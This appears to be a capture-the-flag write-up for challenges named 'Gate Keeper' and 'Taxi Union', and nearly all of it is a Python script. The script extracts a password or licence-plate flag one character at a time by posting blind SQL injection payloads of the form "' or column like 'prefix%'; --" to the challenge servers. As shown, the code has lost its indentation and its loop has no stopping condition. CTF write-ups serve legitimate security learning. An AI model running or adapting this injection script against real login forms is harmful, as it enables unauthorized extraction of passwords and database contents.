# Gate Keeper
Author: [roerohan](https://github.com/roerohan)
## Exploit
SQL Injection. This also works for the [Taxi Union](../taxi%20union) challenge.
import requests
import string
flag = ''
domain = string.ascii_lowercase + string.ascii_uppercase + string.digits + '_}'
f = 0
challenge = "gate keeper"
url = ""
check = ""
key = ""
column = ""
if challenge == "taxi union":
url = 'http://extremely.uniquename.xyz:2052/'
check = "TN-06-AP-9879"
key = 'lisence_plate'
column = "location"
elif challenge == 'gate keeper':
url = 'http://extremely.uniquename.xyz:2082/'
check = "The flag for the CTF is the password you entered.(If you havent cheated that is)"
key = 'password'
column = "password"
print("URL", url)
while True:
for char in domain:
payload = "' or {} like '{}%'; --".format(column, flag + char)
r = requests.post(url, data={key: payload})
if (check in r.text):
flag = flag + char
print("Success " + flag)